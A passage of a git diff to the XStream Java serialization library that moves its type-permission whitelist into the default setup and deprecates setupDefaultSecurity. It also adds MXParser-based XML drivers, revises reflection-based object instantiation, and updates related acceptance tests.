+ types.add(JVM.loadClassForName("java.time.Duration"));
+ types.add(JVM.loadClassForName("java.time.Instant"));
+ types.add(JVM.loadClassForName("java.time.LocalDate"));
+ types.add(JVM.loadClassForName("java.time.LocalDateTime"));
+ types.add(JVM.loadClassForName("java.time.LocalTime"));
+ types.add(JVM.loadClassForName("java.time.MonthDay"));
+ types.add(JVM.loadClassForName("java.time.OffsetDateTime"));
+ types.add(JVM.loadClassForName("java.time.OffsetTime"));
+ types.add(JVM.loadClassForName("java.time.Period"));
+ types.add(JVM.loadClassForName("java.time.Ser"));
+ types.add(JVM.loadClassForName("java.time.Year"));
+ types.add(JVM.loadClassForName("java.time.YearMonth"));
+ types.add(JVM.loadClassForName("java.time.ZonedDateTime"));
+ allowTypeHierarchy(JVM.loadClassForName("java.time.ZoneId"));
+ types.add(JVM.loadClassForName("java.time.chrono.HijrahDate"));
+ types.add(JVM.loadClassForName("java.time.chrono.JapaneseDate"));
+ types.add(JVM.loadClassForName("java.time.chrono.JapaneseEra"));
+ types.add(JVM.loadClassForName("java.time.chrono.MinguoDate"));
+ types.add(JVM.loadClassForName("java.time.chrono.ThaiBuddhistDate"));
+ types.add(JVM.loadClassForName("java.time.chrono.Ser"));
+ allowTypeHierarchy(JVM.loadClassForName("java.time.chrono.Chronology"));
+ types.add(JVM.loadClassForName("java.time.temporal.ValueRange"));
+ types.add(JVM.loadClassForName("java.time.temporal.WeekFields"));
+ }
+ types.remove(null);
+
+ final Iterator iter = types.iterator();
+ final Class[] classes = new Class[types.size()];
+ for (int i = 0; i < classes.length; ++i) {
+ classes[i] = (Class)iter.next();
+ }
+ allowTypes(classes);
+ }
+
+ private void denyTypeHierarchyDynamically(String className) {
+ Class type = JVM.loadClassForName(className);
+ if (type != null) {
+ denyTypeHierarchy(type);
+ }
}
/**
* Setup the security framework of a XStream instance.
* <p>
- * This method is a pure helper method for XStream 1.4.x. It initializes an XStream instance with a white list of
- * well-known and simply types of the Java runtime as it is done in XStream 1.5.x by default. This method will do
- * therefore nothing in XStream 1.5.
+ * This method was a pure helper method for XStream 1.4.10 to 1.4.17. It initialized an XStream instance with a
+ * whitelist of well-known and simply types of the Java runtime as it is done in XStream 1.4.18 by default. This
+ * method will do therefore nothing in XStream 1.4.18 or higher.
* </p>
*
* @param xstream
* @since 1.4.10
+ * @deprecated As of 1.4.18
*/
public static void setupDefaultSecurity(final XStream xstream) {
- if (!xstream.securityInitialized) {
- xstream.addPermission(NoTypePermission.NONE);
- xstream.addPermission(NullPermission.NULL);
- xstream.addPermission(PrimitiveTypePermission.PRIMITIVES);
- xstream.addPermission(ArrayTypePermission.ARRAYS);
- xstream.addPermission(InterfaceTypePermission.INTERFACES);
- xstream.allowTypeHierarchy(Calendar.class);
- xstream.allowTypeHierarchy(Collection.class);
- xstream.allowTypeHierarchy(Map.class);
- xstream.allowTypeHierarchy(Map.Entry.class);
- xstream.allowTypeHierarchy(Member.class);
- xstream.allowTypeHierarchy(Number.class);
- xstream.allowTypeHierarchy(Throwable.class);
- xstream.allowTypeHierarchy(TimeZone.class);
-
- Class type = JVM.loadClassForName("java.lang.Enum");
- if (type != null) {
- xstream.allowTypeHierarchy(type);
- }
- type = JVM.loadClassForName("java.nio.file.Path");
- if (type != null) {
- xstream.allowTypeHierarchy(type);
- }
-
- final Set types = new HashSet();
- types.add(BitSet.class);
- types.add(Charset.class);
- types.add(Class.class);
- types.add(Currency.class);
- types.add(Date.class);
- types.add(DecimalFormatSymbols.class);
- types.add(File.class);
- types.add(Locale.class);
- types.add(Object.class);
- types.add(Pattern.class);
- types.add(StackTraceElement.class);
- types.add(String.class);
- types.add(StringBuffer.class);
- types.add(JVM.loadClassForName("java.lang.StringBuilder"));
- types.add(URL.class);
- types.add(URI.class);
- types.add(JVM.loadClassForName("java.util.UUID"));
- if (JVM.isSQLAvailable()) {
- types.add(JVM.loadClassForName("java.sql.Timestamp"));
- types.add(JVM.loadClassForName("java.sql.Time"));
- types.add(JVM.loadClassForName("java.sql.Date"));
- }
- if (JVM.isVersion(8)) {
- xstream.allowTypeHierarchy(JVM.loadClassForName("java.time.Clock"));
- types.add(JVM.loadClassForName("java.time.Duration"));
- types.add(JVM.loadClassForName("java.time.Instant"));
- types.add(JVM.loadClassForName("java.time.LocalDate"));
- types.add(JVM.loadClassForName("java.time.LocalDateTime"));
- types.add(JVM.loadClassForName("java.time.LocalTime"));
- types.add(JVM.loadClassForName("java.time.MonthDay"));
- types.add(JVM.loadClassForName("java.time.OffsetDateTime"));
- types.add(JVM.loadClassForName("java.time.OffsetTime"));
- types.add(JVM.loadClassForName("java.time.Period"));
- types.add(JVM.loadClassForName("java.time.Ser"));
- types.add(JVM.loadClassForName("java.time.Year"));
- types.add(JVM.loadClassForName("java.time.YearMonth"));
- types.add(JVM.loadClassForName("java.time.ZonedDateTime"));
- xstream.allowTypeHierarchy(JVM.loadClassForName("java.time.ZoneId"));
- types.add(JVM.loadClassForName("java.time.chrono.HijrahDate"));
- types.add(JVM.loadClassForName("java.time.chrono.JapaneseDate"));
- types.add(JVM.loadClassForName("java.time.chrono.JapaneseEra"));
- types.add(JVM.loadClassForName("java.time.chrono.MinguoDate"));
- types.add(JVM.loadClassForName("java.time.chrono.ThaiBuddhistDate"));
- types.add(JVM.loadClassForName("java.time.chrono.Ser"));
- xstream.allowTypeHierarchy(JVM.loadClassForName("java.time.chrono.Chronology"));
- types.add(JVM.loadClassForName("java.time.temporal.ValueRange"));
- types.add(JVM.loadClassForName("java.time.temporal.WeekFields"));
- }
- types.remove(null);
-
- final Iterator iter = types.iterator();
- final Class[] classes = new Class[types.size()];
- for (int i = 0; i < classes.length; ++i) {
- classes[i] = (Class)iter.next();
- }
- xstream.allowTypes(classes);
- } else {
- throw new IllegalArgumentException("Security framework of XStream instance already initialized");
- }
}
protected void setupAliases() {
@@ -1400,14 +1388,7 @@ public class XStream {
*/
public Object unmarshal(HierarchicalStreamReader reader, Object root, DataHolder dataHolder) {
try {
- if (!securityInitialized && !securityWarningGiven) {
- securityWarningGiven = true;
- System.err
- .println(
- "Security framework of XStream not explicitly initialized, using predefined black list on your own risk.");
- }
return marshallingStrategy.unmarshal(root, reader, dataHolder, converterLookup, mapper);
-
} catch (ConversionException e) {
Package pkg = getClass().getPackage();
String version = pkg != null ? pkg.getImplementationVersion() : null;
@@ -2235,7 +2216,6 @@ public class XStream {
*/
public void addPermission(TypePermission permission) {
if (securityMapper != null) {
- securityInitialized |= permission.equals(NoTypePermission.NONE) || permission.equals(AnyTypePermission.ANY);
securityMapper.addPermission(permission);
}
}
@@ -2390,11 +2370,6 @@ public class XStream {
denyPermission(new WildcardTypePermission(patterns));
}
- private Object readResolve() {
- securityWarningGiven = true;
- return this;
- }
-
/**
* @deprecated As of 1.3, use {@link com.thoughtworks.xstream.InitializationException} instead
*/
diff --git a/xstream/src/java/com/thoughtworks/xstream/XStreamer.java b/xstream/src/java/com/thoughtworks/xstream/XStreamer.java
index a4245a1f28a9b942b174e94a048648366ee2af71..2d6ffc4ac90472291c92d3a8d6c795202229c987 100644
--- a/xstream/src/java/com/thoughtworks/xstream/XStreamer.java
+++ b/xstream/src/java/com/thoughtworks/xstream/XStreamer.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2006, 2007, 2014, 2016, 2017, 2018 XStream Committers.
+ * Copyright (C) 2006, 2007, 2014, 2016, 2017, 2018, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -107,7 +107,6 @@ public class XStreamer {
public void toXML(final XStream xstream, final Object obj, final Writer out)
throws IOException {
final XStream outer = new XStream();
- XStream.setupDefaultSecurity(outer);
final ObjectOutputStream oos = outer.createObjectOutputStream(out);
try {
oos.writeObject(xstream);
@@ -268,7 +267,6 @@ public class XStreamer {
public Object fromXML(final HierarchicalStreamDriver driver, final Reader xml, final TypePermission[] permissions)
throws IOException, ClassNotFoundException {
final XStream outer = new XStream(driver);
- XStream.setupDefaultSecurity(outer);
for(int i = 0; i < permissions.length; ++i) {
outer.addPermission(permissions[i]);
}
diff --git a/xstream/src/java/com/thoughtworks/xstream/converters/reflection/PureJavaReflectionProvider.java b/xstream/src/java/com/thoughtworks/xstream/converters/reflection/PureJavaReflectionProvider.java
index 3a52c453414e3f2ba735510633594920257246bf..6a88fb2ffbf625e2c2ccfd33a25d3b35b55fdcf0 100644
--- a/xstream/src/java/com/thoughtworks/xstream/converters/reflection/PureJavaReflectionProvider.java
+++ b/xstream/src/java/com/thoughtworks/xstream/converters/reflection/PureJavaReflectionProvider.java
@@ -1,6 +1,6 @@
/*
* Copyright (C) 2004, 2005, 2006 Joe Walnes.
- * Copyright (C) 2006, 2007, 2009, 2011, 2013, 2016, 2018, 2020 XStream Committers.
+ * Copyright (C) 2006, 2007, 2009, 2011, 2013, 2016, 2018, 2020, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -27,11 +27,16 @@ import java.io.Serializable;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
+import java.lang.reflect.Method;
import java.lang.reflect.Modifier;
import java.util.Iterator;
import java.util.Map;
import java.util.WeakHashMap;
+import com.thoughtworks.xstream.converters.ConversionException;
+import com.thoughtworks.xstream.converters.ErrorWritingException;
+import com.thoughtworks.xstream.core.util.Fields;
+
/**
* Pure Java ObjectFactory that instantiates objects using standard Java reflection, however the types of objects that
@@ -50,6 +55,7 @@ import java.util.WeakHashMap;
*/
public class PureJavaReflectionProvider implements ReflectionProvider {
+ private transient Map objectStreamClassCache;
private transient Map serializedDataCache;
protected FieldDictionary fieldDictionary;
@@ -104,8 +110,19 @@ public class PureJavaReflectionProvider implements ReflectionProvider {
private Object instantiateUsingSerialization(final Class type) {
ObjectAccessException oaex = null;
try {
+ if (Reflections.newInstance != null) {
+ synchronized (objectStreamClassCache) {
+ ObjectStreamClass osClass = (ObjectStreamClass)objectStreamClassCache.get(type);
+ if (osClass == null) {
+ osClass = ObjectStreamClass.lookup(type);
+ objectStreamClassCache.put(type, osClass);
+ }
+ return Reflections.newInstance.invoke(osClass, new Object[0]);
+ }
+ }
+ byte[] data;
synchronized (serializedDataCache) {
- byte[] data = (byte[])serializedDataCache.get(type);
+ data = (byte[])serializedDataCache.get(type);
if (data == null) {
ByteArrayOutputStream bytes = new ByteArrayOutputStream();
DataOutputStream stream = new DataOutputStream(bytes);
@@ -122,18 +139,25 @@ public class PureJavaReflectionProvider implements ReflectionProvider {
data = bytes.toByteArray();
serializedDataCache.put(type, data);
}
-
- ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(data)) {
- protected Class resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
- return Class.forName(desc.getName(), false, type.getClassLoader());
- }
- };
- return in.readObject();
}
- } catch (IOException e) {
+ final ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(data)) {
+ protected Class resolveClass(final ObjectStreamClass desc) throws ClassNotFoundException {
+ return Class.forName(desc.getName(), false, type.getClassLoader());
+ }
+ };
+ return in.readObject();
+ } catch (final ObjectAccessException e) {
+ oaex = e;
+ } catch (final IOException e) {
oaex = new ObjectAccessException("Cannot create type by JDK serialization", e);
} catch (ClassNotFoundException e) {
oaex = new ObjectAccessException("Cannot find class", e);
+ } catch (IllegalAccessException e) {
+ oaex = new ObjectAccessException("Cannot create type by JDK object stream data", e);
+ } catch (IllegalArgumentException e) {
+ oaex = new ObjectAccessException("Cannot create type by JDK object stream data", e);
+ } catch (InvocationTargetException e) {
+ oaex = new ObjectAccessException("Cannot create type by JDK object stream data", e);
}
oaex.add("construction-type", type.getName());
throw oaex;
@@ -207,6 +231,23 @@ public class PureJavaReflectionProvider implements ReflectionProvider {
}
protected void init() {
+ objectStreamClassCache = new WeakHashMap();
serializedDataCache = new WeakHashMap();
}
+
+ private static class Reflections {
+ private final static Method newInstance;
+ static {
+ Method method = null;
+ try {
+ method = ObjectStreamClass.class.getDeclaredMethod("newInstance", new Class[0]);
+ method.setAccessible(true);
+ } catch (final NoSuchMethodException e) {
+ // not available
+ } catch (final SecurityException e) {
+ // not available
+ }
+ newInstance = method;
+ }
+ }
}
diff --git a/xstream/src/java/com/thoughtworks/xstream/io/xml/MXParserDomDriver.java b/xstream/src/java/com/thoughtworks/xstream/io/xml/MXParserDomDriver.java
new file mode 100644
index 0000000000000000000000000000000000000000..da75574561d5b3b3ae34890f76f2c41f0484d883
--- /dev/null
+++ b/xstream/src/java/com/thoughtworks/xstream/io/xml/MXParserDomDriver.java
@@ -0,0 +1,53 @@
+/*
+ * Copyright (C) 2021 XStream Committers.
+ * All rights reserved.
+ *
+ * The software in this package is published under the terms of the BSD
+ * style license a copy of which has been included with this distribution in
+ * the LICENSE.txt file.
+ *
+ * Created on 02. January 2021 by Joerg Schaible
+ */
+package com.thoughtworks.xstream.io.xml;
+
+import com.thoughtworks.xstream.io.HierarchicalStreamDriver;
+import com.thoughtworks.xstream.io.naming.NameCoder;
+
+import io.github.xstream.mxparser.MXParser;
+
+import org.xmlpull.v1.XmlPullParser;
+
+/**
+ * A {@link HierarchicalStreamDriver} for XPP DOM using the MXParser fork.
+ *
+ * @author Jörg Schaible
+ * @since 1.4.16
+ */
+public class MXParserDomDriver extends AbstractXppDomDriver {
+
+ /**
+ * Construct an MXParserDomDriver.
+ *
+ * @since 1.4.16
+ */
+ public MXParserDomDriver() {
+ super(new XmlFriendlyNameCoder());
+ }
+
+ /**
+ * Construct an Xpp3DomDriver.
+ *
+ * @param nameCoder the replacer for XML friendly names
+ * @since 1.4
+ */
+ public MXParserDomDriver(NameCoder nameCoder) {
+ super(nameCoder);
+ }
+
+ /**
+ * {@inheritDoc}
+ */
+ protected XmlPullParser createParser() {
+ return new MXParser();
+ }
+}
diff --git a/xstream/src/java/com/thoughtworks/xstream/io/xml/MXParserDriver.java b/xstream/src/java/com/thoughtworks/xstream/io/xml/MXParserDriver.java
new file mode 100644
index 0000000000000000000000000000000000000000..3ecf31244146775515b2e2e8eba384e808109120
--- /dev/null
+++ b/xstream/src/java/com/thoughtworks/xstream/io/xml/MXParserDriver.java
@@ -0,0 +1,55 @@
+/*
+ * Copyright (C) 2021 XStream Committers.
+ * All rights reserved.
+ *
+ * The software in this package is published under the terms of the BSD
+ * style license a copy of which has been included with this distribution in
+ * the LICENSE.txt file.
+ *
+ * Created on 2. January 2021 by Joerg Schaible
+ */
+package com.thoughtworks.xstream.io.xml;
+
+
+import com.thoughtworks.xstream.io.HierarchicalStreamDriver;
+import com.thoughtworks.xstream.io.naming.NameCoder;
+
+import io.github.xstream.mxparser.MXParser;
+
+import org.xmlpull.v1.XmlPullParser;
+
+
+/**
+ * A {@link HierarchicalStreamDriver} using the MXParser fork.
+ *
+ * @author Jörg Schaible
+ * @since 1.4.16
+ */
+public class MXParserDriver extends AbstractXppDriver {
+
+ /**
+ * Construct an MXParserDriver.
+ *
+ * @since 1.4.16
+ */
+ public MXParserDriver() {
+ super(new XmlFriendlyNameCoder());
+ }
+
+ /**
+ * Construct an Xpp3Driver.
+ *
+ * @param nameCoder the replacer for XML friendly names
+ * @since 1.4.16
+ */
+ public MXParserDriver(NameCoder nameCoder) {
+ super(nameCoder);
+ }
+
+ /**
+ * {@inheritDoc}
+ */
+ protected XmlPullParser createParser() {
+ return new MXParser();
+ }
+}
diff --git a/xstream/src/java/com/thoughtworks/xstream/io/xml/XmlFriendlyNameCoder.java b/xstream/src/java/com/thoughtworks/xstream/io/xml/XmlFriendlyNameCoder.java
index b1c6f51a92801fe7481eb18cfd9f83f10e22f829..94991221f90b4c18bd29fe06d3d500dd074f32db 100644
--- a/xstream/src/java/com/thoughtworks/xstream/io/xml/XmlFriendlyNameCoder.java
+++ b/xstream/src/java/com/thoughtworks/xstream/io/xml/XmlFriendlyNameCoder.java
@@ -1,6 +1,6 @@
/*
* Copyright (C) 2006 Joe Walnes.
- * Copyright (C) 2006, 2007, 2008, 2009, 2011, 2013, 2019, 2020 XStream Committers.
+ * Copyright (C) 2006, 2007, 2008, 2009, 2011, 2013, 2019, 2020, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -495,7 +495,7 @@ public class XmlFriendlyNameCoder implements NameCoder, Cloneable {
for (; i < length; i++) {
final char c = name.charAt(i);
- if (c < 'A' || (c > 'Z' && c < 'a') || c > 'Z') {
+ if (c < 'A' || (c > 'Z' && c < 'a') || c > 'z') {
break;
}
}
diff --git a/xstream/src/java/com/thoughtworks/xstream/mapper/ImmutableTypesMapper.java b/xstream/src/java/com/thoughtworks/xstream/mapper/ImmutableTypesMapper.java
index b21880716c90e3ae8ba040e9b91463bf62f3c190..1dcbd372313dae024e6f4796c2624a89e8ff10ad 100644
--- a/xstream/src/java/com/thoughtworks/xstream/mapper/ImmutableTypesMapper.java
+++ b/xstream/src/java/com/thoughtworks/xstream/mapper/ImmutableTypesMapper.java
@@ -1,6 +1,6 @@
/*
* Copyright (C) 2005 Joe Walnes.
- * Copyright (C) 2006, 2007, 2009, 2015 XStream Committers.
+ * Copyright (C) 2006, 2007, 2009, 2015, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -66,8 +66,8 @@ public class ImmutableTypesMapper extends MapperWrapper {
}
public boolean isReferenceable(final Class type) {
- if (unreferenceableTypes.contains(type)) {
- return false;
+ if (immutableTypes.contains(type)) {
+ return !unreferenceableTypes.contains(type);
} else {
return super.isReferenceable(type);
}
diff --git a/xstream/src/test/com/thoughtworks/acceptance/AbstractAcceptanceTest.java b/xstream/src/test/com/thoughtworks/acceptance/AbstractAcceptanceTest.java
index ee1114165e90384eba454b81d8081bbcc864f5af..7ac6f3a7a907621b8f734db4310a547a61f6e2b3 100644
--- a/xstream/src/test/com/thoughtworks/acceptance/AbstractAcceptanceTest.java
+++ b/xstream/src/test/com/thoughtworks/acceptance/AbstractAcceptanceTest.java
@@ -1,6 +1,6 @@
/*
* Copyright (C) 2003, 2004, 2005, 2006 Joe Walnes.
- * Copyright (C) 2006, 2007, 2008, 2014, 2015 XStream Committers.
+ * Copyright (C) 2006, 2007, 2008, 2014, 2015, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -11,23 +11,15 @@
*/
package com.thoughtworks.acceptance;
-import java.lang.reflect.AccessibleObject;
import java.lang.reflect.Array;
-import java.net.URL;
-import java.nio.charset.Charset;
-import java.text.DecimalFormatSymbols;
-import java.util.BitSet;
-import java.util.Calendar;
-import java.util.Collection;
-import java.util.Currency;
-import java.util.Date;
-import java.util.Locale;
-import java.util.Map;
-import java.util.TimeZone;
-import java.util.regex.Pattern;
import java.io.ByteArrayOutputStream;
import java.io.ByteArrayInputStream;
-import java.io.File;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.NotSerializableException;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+import java.io.OutputStream;
import java.io.StringReader;
import java.io.StringWriter;
@@ -45,11 +37,6 @@ import com.thoughtworks.xstream.io.HierarchicalStreamDriver;
import com.thoughtworks.xstream.io.binary.BinaryStreamWriter;
import com.thoughtworks.xstream.io.binary.BinaryStreamReader;
import com.thoughtworks.xstream.io.xml.XppDriver;
-import com.thoughtworks.xstream.security.ArrayTypePermission;
-import com.thoughtworks.xstream.security.InterfaceTypePermission;
-import com.thoughtworks.xstream.security.NoTypePermission;
-import com.thoughtworks.xstream.security.NullPermission;
-import com.thoughtworks.xstream.security.PrimitiveTypePermission;
public abstract class AbstractAcceptanceTest extends TestCase {
@@ -78,23 +65,6 @@ public abstract class AbstractAcceptanceTest extends TestCase {
}
protected void setupSecurity(XStream xstream) {
- xstream.addPermission(NoTypePermission.NONE); // clear out defaults
- xstream.addPermission(NullPermission.NULL);
- xstream.addPermission(ArrayTypePermission.ARRAYS);
- xstream.addPermission(InterfaceTypePermission.INTERFACES);
- xstream.addPermission(PrimitiveTypePermission.PRIMITIVES);
- xstream.allowTypeHierarchy(AccessibleObject.class);
- xstream.allowTypeHierarchy(Calendar.class);
- xstream.allowTypeHierarchy(Collection.class);
- xstream.allowTypeHierarchy(Map.class);
- xstream.allowTypeHierarchy(Map.Entry.class);
- xstream.allowTypeHierarchy(Number.class);
- xstream.allowTypeHierarchy(TimeZone.class);
- xstream.allowTypeHierarchy(Throwable.class);
- xstream.allowTypes(new Class[]{
- BitSet.class, Charset.class, Class.class, Currency.class, Date.class, DecimalFormatSymbols.class,
- File.class, Locale.class, Object.class, Pattern.class, StackTraceElement.class, String.class,
- StringBuffer.class, URL.class});
xstream.allowTypesByWildcard(new String[]{
AbstractAcceptanceTest.class.getPackage().getName()+".*objects.**",
this.getClass().getName()+"$*"
@@ -110,8 +80,7 @@ public abstract class AbstractAcceptanceTest extends TestCase {
assertEquals(
normalizedXML(xml, new String[]{match}, templateSelect, sortSelect), resultXml);
- // Now deserialize the XML back into the object and check it equals the original
- // object.
+ // Now deserialize the XML back into the object and check it equals the original object.
Object resultRoot = xstream.fromXML(resultXml);
assertObjectsEqual(root, resultRoot);
@@ -162,6 +131,58 @@ public abstract class AbstractAcceptanceTest extends TestCase {
return resultRoot;
}
+ protected static void serialize(final Object object, final OutputStream outputStream) {
+ try {
+ ObjectOutputStream out = new ObjectOutputStream(outputStream);
+ out.writeObject(object);
+ out.close();
+ } catch (final NotSerializableException e) {
+ fail("Serialization of object of type "
+ + object.getClass().getName()
+ + " failed because of reference to type "
+ + e.getMessage(), e);
+ } catch (final IOException e) {
+ fail("Serialization of object of type " + object.getClass().getName() + " failed", e);
+ }
+ }
+
+ protected static Object deserialize(final InputStream inputStream) {
+ try {
+ ObjectInputStream out = new ObjectInputStream(inputStream);
+ final Object t = out.readObject();
+ out.close();
+ return t;
+ } catch (final ClassNotFoundException e) {
+ fail("Cannot find class " + e.getMessage() + " during deserialization", e);
+ throw new AssertionFailedError(); // never reached
+ } catch (final IOException e) {
+ fail("Deserialization failed reading the InputStream", e);
+ throw new AssertionFailedError(); // never reached
+ }
+ }
+
+ protected Object assertJavaSerialization(final Object in) {
+ byte[] data;
+ try {
+ ByteArrayOutputStream os = new ByteArrayOutputStream();
+ serialize(in, os);
+ data = os.toByteArray();
+ os.close();
+ } catch (final IOException e) {
+ fail("Serialization failed closing the OutputStream", e);
+ throw new AssertionFailedError(); // never reached
+ }
+ try {
+ InputStream is = new ByteArrayInputStream(data);
+ Object t = deserialize(is);
+ is.close();
+ return t;
+ } catch (final IOException e) {
+ fail("Deserialization failed closing the InputStream", e);
+ throw new AssertionFailedError(); // never reached
+ }
+ }
+
/**
* Allow derived classes to decide how to turn the object into XML text
*/
@@ -254,4 +275,10 @@ public abstract class AbstractAcceptanceTest extends TestCase {
.transform(new StreamSource(new StringReader(xml)), new StreamResult(writer));
return writer.toString();
}
+
+ protected static void fail(final String message, final Throwable cause) {
+ final AssertionFailedError err = new AssertionFailedError(message);
+ err.initCause(cause);
+ throw err;
+ }
}
diff --git a/xstream/src/test/com/thoughtworks/acceptance/AbstractReferenceTest.java b/xstream/src/test/com/thoughtworks/acceptance/AbstractReferenceTest.java
index 07664a4da461b6d865fb8017620416294f3bc05a..d27b841d3d17c208377695e91a5be6b99125138a 100644
--- a/xstream/src/test/com/thoughtworks/acceptance/AbstractReferenceTest.java
+++ b/xstream/src/test/com/thoughtworks/acceptance/AbstractReferenceTest.java
@@ -1,6 +1,6 @@
/*
* Copyright (C) 2004, 2005 Joe Walnes.
- * Copyright (C) 2006, 2007, 2009, 2010, 2011, 2014, 2015 XStream Committers.
+ * Copyright (C) 2006, 2007, 2009, 2010, 2011, 2014, 2015, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -23,7 +23,9 @@ import java.util.List;
import com.thoughtworks.acceptance.objects.StandardObject;
import com.thoughtworks.acceptance.someobjects.WithNamedList;
import com.thoughtworks.xstream.converters.ConversionException;
+import com.thoughtworks.xstream.converters.basic.AbstractSingleValueConverter;
import com.thoughtworks.xstream.core.AbstractReferenceMarshaller;
+import com.thoughtworks.xstream.core.JVM;
public abstract class AbstractReferenceTest extends AbstractAcceptanceTest {
@@ -526,7 +528,57 @@ public abstract class AbstractReferenceTest extends AbstractAcceptanceTest {
Thing t1 = (Thing)result.get(1);
Thing t2 = (Thing)result.get(2);
- assertEquals(t0, t1);
assertSame(t0, t1);
+ assertNotSame(t0, t2);
+ assertEquals(t0, t2);
+ }
+
+ private static class ThingConverter extends AbstractSingleValueConverter {
+
+ public boolean canConvert(Class type) {
+ return type == Thing.class;
+ }
+
+ public Object fromString(String str) {
+ throw new UnsupportedOperationException();
+ }
+
+ public String toString(Object obj) {
+ return ((Thing)obj).field;
+ }
+ }
+
+ public void testImmutableEnumInstancesCanBeDereferenced() {
+
+ if (JVM.is15()) {
+ Thing green = new Thing("GREEN");
+ List list = new ArrayList();
+ list.add(green);
+ list.add(green);
+
+ xstream.allowTypes(new String[]{"com.thoughtworks.xstream.converters.enums.SimpleEnum"});
+ xstream.alias("simple", Thing.class);
+ xstream.registerConverter(new ThingConverter());
+ String xml = xstream.toXML(list);
+
+ Class enumType = JVM.loadClassForName("com.thoughtworks.xstream.converters.enums.SimpleEnum");
+ xstream.alias("simple", enumType);
+
+ try {
+ xstream.fromXML(xml);
+ fail("Thrown " + ConversionException.class.getName() + " expected");
+ } catch (final ConversionException e) {
+ assertEquals(enumType.getName(), e.get("referenced-type"));
+ }
+
+ xstream.addImmutableType(enumType, true);
+
+ List result = (List)xstream.fromXML(xml);
+
+ Object t0 = result.get(0);
+ Object t1 = result.get(1);
+
+ assertSame(t0, t1);
+ }
}
}
diff --git a/xstream/src/test/com/thoughtworks/acceptance/CustomSerializationTest.java b/xstream/src/test/com/thoughtworks/acceptance/CustomSerializationTest.java
index 34cecf15a2ca903dd0b91b7732af356a486abbde..ba0e22d782d2afc2e0184271373b33a9d4dd8f7e 100644
--- a/xstream/src/test/com/thoughtworks/acceptance/CustomSerializationTest.java
+++ b/xstream/src/test/com/thoughtworks/acceptance/CustomSerializationTest.java
@@ -1,6 +1,6 @@
/*
* Copyright (C) 2004, 2005 Joe Walnes.
- * Copyright (C) 2006, 2007, 2015 XStream Committers.
+ * Copyright (C) 2006, 2007, 2015, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -21,6 +21,13 @@ import java.io.ObjectOutputStream;
import java.io.ObjectStreamField;
import java.io.Serializable;
+import com.thoughtworks.acceptance.objects.Hardware;
+import com.thoughtworks.acceptance.objects.Software;
+import com.thoughtworks.acceptance.objects.StandardObject;
+import com.thoughtworks.xstream.XStream;
+import com.thoughtworks.xstream.converters.reflection.PureJavaReflectionProvider;
+
+
public class CustomSerializationTest extends AbstractAcceptanceTest {
public static class ObjectWithCustomSerialization extends StandardObject implements Serializable {
@@ -201,6 +208,59 @@ public class CustomSerializationTest extends AbstractAcceptanceTest {
assertBothWays(child, expectedXml);
}
+ static class Pair {
+ protected Object first;
+ protected Object second;
+
+ protected Pair() {
+ }
+
+ public Pair(final Object first, final Object second) {
+ this.first = first;
+ this.second = second;
+ }
+ }
+
+ static class SerializablePair extends Pair implements Serializable {
+ private static final long serialVersionUID = 20201214L;
+
+ public SerializablePair(final Object first, final Object second) {
+ super(first, second);
+ }
+
+ private void writeObject(final ObjectOutputStream out) throws IOException {
+ out.writeObject(first);
+ out.writeObject(second);
+ }
+
+ private void readObject(final ObjectInputStream in) throws IOException, ClassNotFoundException {
+ first = in.readObject();
+ second = in.readObject();
+ }
+ }
+
+ public void testCustomSerializationWithoutDefaultReadAndWriteObject() {
+ xstream = new XStream(new PureJavaReflectionProvider());
+ setupSecurity(xstream);
+ xstream.alias("pair", Pair.class);
+ xstream.alias("serpair", SerializablePair.class);
+
+ final String expectedXml = ""
+ + "<serpair serialization=\"custom\">\n"
+ + " <unserializable-parents>\n"
+ + " <first class=\"int\">42</first>\n"
+ + " <second class=\"string\">fourty-two</second>\n"
+ + " </unserializable-parents>\n"
+ + " <serpair>\n"
+ + " <int>42</int>\n"
+ + " <string>fourty-two</string>\n"
+ + " </serpair>\n"
+ + "</serpair>";
+
+ final Pair pair = (Pair)new SerializablePair(new Integer(42), "fourty-two");
+ assertBothWays(pair, expectedXml.replace('\'', '"'));
+ }
+
static class MyDate extends java.util.Date {
public MyDate(int time) {
super(time);
diff --git a/xstream/src/test/com/thoughtworks/acceptance/EncodingTestSuite.java b/xstream/src/test/com/thoughtworks/acceptance/EncodingTestSuite.java
index 38f13364b08a9f172c83fb2d62289e78293c18be..62f419b2e492abf2477298b6002feb506bfb7d7b 100644
--- a/xstream/src/test/com/thoughtworks/acceptance/EncodingTestSuite.java
+++ b/xstream/src/test/com/thoughtworks/acceptance/EncodingTestSuite.java
@@ -1,6 +1,6 @@
/*
* Copyright (C) 2006 Joe Walnes.
- * Copyright (C) 2006, 2007, 2008, 2016, 2017 XStream Committers.
+ * Copyright (C) 2006, 2007, 2008, 2016, 2017, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -100,7 +100,6 @@ public class EncodingTestSuite extends TestSuite {
+ "</test>";
final XStream xstream = new XStream(driver);
- XStream.setupDefaultSecurity(xstream);
xstream.allowTypesByWildcard(new String[] {getClass().getName()+"$*"});
xstream.alias("test", TestObject.class);
final TestObject obj = new TestObject();
diff --git a/xstream/src/test/com/thoughtworks/acceptance/MultipleObjectsInOneStreamTest.java b/xstream/src/test/com/thoughtworks/acceptance/MultipleObjectsInOneStreamTest.java
index 99995f1fbcd1f88b5d57530aff958f28774f2328..557e7923db6e04859d7d186f1863ae3d5393a107 100644
--- a/xstream/src/test/com/thoughtworks/acceptance/MultipleObjectsInOneStreamTest.java
